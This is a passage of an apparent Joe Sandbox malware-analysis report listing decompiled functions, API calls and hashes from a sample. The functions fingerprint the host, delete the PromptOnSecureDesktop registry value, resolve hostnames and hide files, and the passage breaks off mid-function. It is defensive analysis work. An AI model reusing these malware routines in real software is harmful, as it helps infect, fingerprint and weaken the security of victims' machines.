                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTick$closesocket
                                                                                                                                  • String ID: %FROM_EMAIL$0 v
                                                                                                                                  • API String ID: 1869671989-3573081871
                                                                                                                                  • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                                                                  • Instruction ID: 216c6e9fae9a8220cc2e9b20a11e458793e52aa6c0336acd06b959dc8a2ea281
                                                                                                                                  • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                                                                  • Instruction Fuzzy Hash: 05317A71910248DFDF25DFA4DC84AEA77B8EB48700F20456BFA2682261DB30DA85CF24
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E00401AC3() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				struct HINSTANCE__* _t19;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				void* _t41;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_t19 = LoadLibraryA("Iphlpapi.dll");
                                                                                                                                  				if(_t19 == 0) {
                                                                                                                                  					L15:
                                                                                                                                  					return _v16;
                                                                                                                                  				}
                                                                                                                                  				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
                                                                                                                                  				if(_t28 == 0) {
                                                                                                                                  					L14:
                                                                                                                                  					goto L15;
                                                                                                                                  				}
                                                                                                                                  				_push( &_v12);
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_push(0);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t41 =  *_t28(2, 0, 0);
                                                                                                                                  					if(_t41 != 0x6f) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t24 = E0040EBED(_v8, _v12);
                                                                                                                                  					if(_t24 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_push( &_v12);
                                                                                                                                  					_v8 = _t24;
                                                                                                                                  					_push(_t24);
                                                                                                                                  				}
                                                                                                                                  				if(_t41 != 0) {
                                                                                                                                  					L11:
                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                  						E0040EC2E(_v8);
                                                                                                                                  					}
                                                                                                                                  					L13:
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				_t26 = _v8;
                                                                                                                                  				if(_t26 == 0) {
                                                                                                                                  					goto L13;
                                                                                                                                  				} else {
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L8:
                                                                                                                                  					_t43 =  *((intOrPtr*)(_t26 + 0x34));
                                                                                                                                  					_t39 = 0;
                                                                                                                                  					if(_t43 <= 0) {
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						goto L9;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L9:
                                                                                                                                  						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
                                                                                                                                  						_t39 = _t39 + 1;
                                                                                                                                  					} while (_t39 < _t43);
                                                                                                                                  					L10:
                                                                                                                                  					_t26 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                  				} while (_t26 != 0);
                                                                                                                                  				goto L11;
                                                                                                                                  			}

                                                                                                                                  Instruction address column (one address per C-code line above; detached from the code during extraction): 0x00401ad1 0x00401ad4 0x00401adc 0x00401b6b 0x00401b70 0x00401b70 0x00401aef 0x00401af3 0x00401b6a 0x00000000 0x00401b6a 0x00401af9 0x00401afa 0x00401afd 0x00401b00 0x00401b1c 0x00401b22 0x00401b27 0x00000000 0x00000000 0x00401b09 0x00401b12 0x00000000 0x00000000 0x00401b17 0x00401b18 0x00401b1b 0x00401b1b 0x00401b2b 0x00401b5b 0x00401b5e 0x00401b63 0x00401b68 0x00401b69 0x00000000 0x00401b69 0x00401b2d 0x00401b32 0x00000000 0x00000000 0x00000000 0x00000000 0x00401b34 0x00401b34 0x00401b34 0x00401b37 0x00401b3b 0x00000000 0x00000000 0x00000000 0x00000000 0x00401b3d 0x00401b3d 0x00401b4c 0x00401b4f 0x00401b50 0x00401b54 0x00401b54 0x00401b57 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                                                                  • API String ID: 2574300362-1087626847
                                                                                                                                  • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                                                                  • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                                                                  • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                                                                  • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E00408CEE() {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				long _t15;
                                                                                                                                  				char _t17;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                  				void* _t25;
                                                                                                                                  				signed int _t31;
                                                                                                                                  				signed char _t35;
                                                                                                                                  				signed int _t36;
                                                                                                                                  				char* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				signed int _t45;
                                                                                                                                  
                                                                                                                                  				_push(_t34);
                                                                                                                                  				_t31 = 0;
                                                                                                                                  				if( *0x413380 == 0) {
                                                                                                                                  					L17:
                                                                                                                                  					return _t15;
                                                                                                                                  				}
                                                                                                                                  				_t15 = GetTickCount() -  *0x413388;
                                                                                                                                  				if(_t15 < 0xea60) {
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  				_t41 =  *0x413380;
                                                                                                                                  				_t17 =  *_t41;
                                                                                                                                  				_t45 =  *(_t41 + 1);
                                                                                                                                  				_t42 = _t41 + 5;
                                                                                                                                  				_v12 = _t17;
                                                                                                                                  				if(_t17 <= 0) {
                                                                                                                                  					L16:
                                                                                                                                  					_t15 = GetTickCount();
                                                                                                                                  					 *0x413388 = _t15;
                                                                                                                                  					goto L17;
                                                                                                                                  				} else {
                                                                                                                                  					_v8 = _t42;
                                                                                                                                  					do {
                                                                                                                                  						_t35 =  *_v8;
                                                                                                                                  						if(_t35 != 8) {
                                                                                                                                  							if(_t35 != 9) {
                                                                                                                                  								_t36 = _t35;
                                                                                                                                  								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
                                                                                                                                  								if(_t19 == 0) {
                                                                                                                                  									goto L12;
                                                                                                                                  								}
                                                                                                                                  								_t9 = _t19 + 0x34; // 0x3b10c483
                                                                                                                                  								if(_t36 ==  *_t9) {
                                                                                                                                  									_t13 = _t19 + 0x50; // 0x7486850
                                                                                                                                  									_t20 =  *_t13;
                                                                                                                                  									if(_t20 != 0) {
                                                                                                                                  										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
                                                                                                                                  									}
                                                                                                                                  									goto L16;
                                                                                                                                  								}
                                                                                                                                  								goto L12;
                                                                                                                                  							}
                                                                                                                                  							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
                                                                                                                                  							L8:
                                                                                                                                  							if(_t25 != 0) {
                                                                                                                                  								_t6 = _v8 + 1; // 0x3cc6
                                                                                                                                  								_t45 = _t45 |  *_t6;
                                                                                                                                  							}
                                                                                                                                  							goto L12;
                                                                                                                                  						}
                                                                                                                                  						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
                                                                                                                                  						goto L8;
                                                                                                                                  						L12:
                                                                                                                                  						_v8 = _v8 + 5;
                                                                                                                                  						_t31 = _t31 + 1;
                                                                                                                                  					} while (_t31 < _v12);
                                                                                                                                  					goto L16;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  Instruction address column (one address per C-code line above; detached from the code during extraction): 0x00408cf2 0x00408cf4 0x00408cfc 0x00408dae 0x00408db0 0x00408db0 0x00408d08 0x00408d13 0x00000000 0x00000000 0x00408d1b 0x00408d21 0x00408d24 0x00408d27 0x00408d2a 0x00408d2f 0x00408da1 0x00408da1 0x00408da8 0x00000000 0x00408d31 0x00408d31 0x00408d34 0x00408d37 0x00408d3c 0x00408d50 0x00408d6c 0x00408d6f 0x00408d78 0x00000000 0x00000000 0x00408d7a 0x00408d7d 0x00408d8b 0x00408d8b 0x00408d90 0x00408d9e 0x00408da0 0x00000000 0x00408d90 0x00000000 0x00408d7d 0x00408d5a 0x00408d5f 0x00408d62 0x00408d67 0x00408d67 0x00408d67 0x00000000 0x00408d62 0x00408d46 0x00000000 0x00408d7f 0x00408d7f 0x00408d83 0x00408d84 0x00000000 0x00408d89

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountTick
• String ID: 0 v$localcfg
• API String ID: 536389180-2166502722
• Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
• Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
• Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
• Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 00AD76D9
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00AD796D
• RegCloseKey.ADVAPI32(?), ref: 00AD797E
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: PromptOnSecureDesktop
• API String ID: 1332880857-2980165447
• Opcode ID: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
• Instruction ID: 6d14fffa52744168f974ad1ecc59a492c5a7c1baf100199d659b0ef862a875c7
• Opcode Fuzzy Hash: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
• Instruction Fuzzy Hash: A011AC71A04109AFDB118FA9DC45FEFBF78EB95710F140162F526EA291F7B18D408B60
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
• 0 v, xrefs: 0040BFD0
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountTickwsprintf
• String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl$0 v
• API String ID: 2424974917-2279882658
• Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
• Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
• Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
• Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
			// Decompiler output (Joe Sandbox). Derives a per-host identifier: first via subcall
			// 00401AC3 (loads Iphlpapi.dll and resolves GetAdaptersAddresses, see APIs below),
			// then from the computer name, and finally from the volume serial number.
			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;

				// Zero the name buffer at _v28 (rep stos sequence in the original code).
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;                              // buffer size handed to GetComputerNameA
				_t14 = E00401AC3();                     // adapter-based id; zero means that path yielded nothing
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						// Fallback: volume serial number (root path NULL = volume of the current directory).
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					// XOR-fold the computer name bytes into a 32-bit value; the shift
					// amount per byte depends on the byte index (_t21 & 3). _t31 is the
					// frame base and is left undeclared by the decompiler.
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;                        // an all-zero fold is treated as "no id"
					}
					return _t30;
				}
				return _t14;
			}

Instruction addresses for the C-Code lines above (one per statement; the side-by-side column was flattened by extraction): 0x00401bec, 0x00401bf2, 0x00401bf3, 0x00401bf4, 0x00401bf5, 0x00401bf7, 0x00401bf9, 0x00401bfc, 0x00401bfd, 0x00401c04, 0x00401c0b, 0x00401c1d, 0x00401c45, 0x00401c51, 0x00000000, 0x00401c57, 0x00401c1f, 0x00401c24, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00401c26, 0x00401c26, 0x00401c35, 0x00401c37, 0x00401c38, 0x00401c3f, 0x00000000, 0x00000000, 0x00000000, 0x00401c41, 0x00401c5e

APIs
  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
• GetComputerNameA.KERNEL32 ref: 00401C15
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: AddressComputerInformationLibraryLoadNameProcVolume
• String ID: hi_id$localcfg
• API String ID: 2777991786-2393279970
• Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
• Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
• Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
• Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
			// Decompiler output (Joe Sandbox). Opens a key under HKEY_CURRENT_USER whose path is
			// built at runtime, deletes one value from it, then wipes the string buffer.
			E004096FF(void* __ecx) {
				void* _v8;
				char* _t6;
				char* _t10;
				void* _t23;
				void* _t24;

				_t16 = __ecx;
				_push(__ecx);
				// E00402544 appears to build a string into the buffer at 0x4122f8 from
				// encoded data at E004106AC (0x2e bytes); here it yields the subkey path.
				_t6 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t24 = _t23 + 0x14;
				// 0x80000001 = HKEY_CURRENT_USER; 0x103 = KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY.
				if(RegOpenKeyExA(0x80000001, _t6, 0, 0x103,  &_v8) == 0) {
					// Second runtime-built string (9 bytes from E004106A0) is the value name to delete.
					_t10 = E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8);
					_t24 = _t24 + 0x14;
					RegDeleteValueA(_v8, _t10);
					RegCloseKey(_v8);
				}
				// Appears to zero the 0x100-byte string buffer so the decoded text does not linger in memory.
				E0040EE2A(_t16, 0x4122f8, 0, 0x100);
				return 0;
			}

Instruction addresses for the C-Code lines above (one per statement; the side-by-side column was flattened by extraction): 0x004096ff, 0x00409702, 0x00409728, 0x0040972d, 0x0040973e, 0x0040974a, 0x0040974f, 0x00409756, 0x0040975f, 0x0040975f, 0x0040976d, 0x0040977b

APIs
• RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
• RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
• RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CloseDeleteOpenValue
• String ID: PromptOnSecureDesktop
• API String ID: 849931509-2980165447
• Opcode ID: 3ed2d8a4ef93e96002676d69dab26ea3ef884a7e3a5dbf1cf8ebad134320f5ae
• Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
• Opcode Fuzzy Hash: 3ed2d8a4ef93e96002676d69dab26ea3ef884a7e3a5dbf1cf8ebad134320f5ae
• Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00AD999D
                                                                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000), ref: 00AD99BD
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD99C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 849931509-2980165447
                                                                                                                                  • Opcode ID: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                                                                  • Instruction ID: fbbd30b9ee5931268bfc43edf1e8cbdaec19665d6d02a8975eb9aecd3ea4793a
                                                                                                                                  • Opcode Fuzzy Hash: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                                                                  • Instruction Fuzzy Hash: 03F0C2B2680208BBF7106B50AC07FDB3A2CDB94B10F100061FA06B5192F6E59F9082B9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A70D
                                                                                                                                    • Part of subcall function 004174B0: __getptd_noexit.LIBCMTD ref: 004174B6
                                                                                                                                  • __getptd.LIBCMTD ref: 0042A71B
                                                                                                                                  • ___DestructExceptionObject.LIBCMTD ref: 0042A788
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd$DestructExceptionObject__getptd_noexit
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 4290476786-1018135373
                                                                                                                                  • Opcode ID: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction ID: 19b41c0f5f9f5006fc9355230a4f87480302ae86c7099d68876e55ecf8a42a62
                                                                                                                                  • Opcode Fuzzy Hash: 18f22ba1b74fcc9731569e66d22ec055009045e094b273a5a82f3e0ca2ec7b3e
                                                                                                                                  • Instruction Fuzzy Hash: 6A115878A00214ABCB04DF51E444A9E7BB2BF94315F94806AE8084B312C738DE92CB9A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ADDF87
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00ADE584,00AD44E2), ref: 00ADDFA2
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ADDFBA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$Sleep
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 2068822874-3142137124
                                                                                                                                  • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction ID: 3b0aa89a74e08455d0647929c629b23bd7ff2962d857a987b11a29ce2e80a18e
                                                                                                                                  • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction Fuzzy Hash: 02F05E76204204AFC7609F65FD88BA97FA5E74C312F118076E60BC2269C7B096858E2E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00ADEEC5
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 00ADEED9
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADEEDF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                                                                  • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg$u6A
                                                                                                                                  • API String ID: 1594361348-1940331995
                                                                                                                                  • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction ID: 96866c8320bb9eb7cc5da85a672670e49f1c920dbe96028dfd4dec1d8639c5e7
                                                                                                                                  • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction Fuzzy Hash: B1E082306082218FCB008B28F848ACA3BA4AF2A330F008192F082C32A0C7349C80EB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 00AD69E5
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002), ref: 00AD6A26
                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 00AD6A3A
                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00AD6BD8
                                                                                                                                    • Part of subcall function 00ADEE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00AD1DCF,?), ref: 00ADEEA8
                                                                                                                                    • Part of subcall function 00ADEE95: HeapFree.KERNEL32(00000000), ref: 00ADEEAF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3384756699-0
                                                                                                                                  • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                                                                  • Instruction ID: 1ad0c6cfd5f0d92701aa1a496a80601a27e3e178faaffefb94088702eeea7b75
                                                                                                                                  • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                                                                  • Instruction Fuzzy Hash: 0971F67194021DEFDB11DFA4CC80AEEBBB9FB08354F10456BE516EA290D7709E92DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E00401C5F(void* __eflags) {
		signed int _t49;
		signed int _t51;
		void* _t80;
		char _t91;
		void* _t92;
		signed int _t98;
		void* _t101;
		void* _t102;
		void* _t103;
		void* _t105;
		void* _t107;
		void* _t108;

		_t105 = _t107 - 0x70;
		_t108 = _t107 - 0x114;
		 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
		_t98 =  *(_t105 + 0x7c);
		 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
		_t101 = E0040ED03(_t98, 0x2c);
		if(_t101 == 0) {
			L6:
			_t49 = _t98;
			_t32 = _t49 + 1; // 0x2
			_t102 = _t32;
			do {
				_t91 =  *_t49;
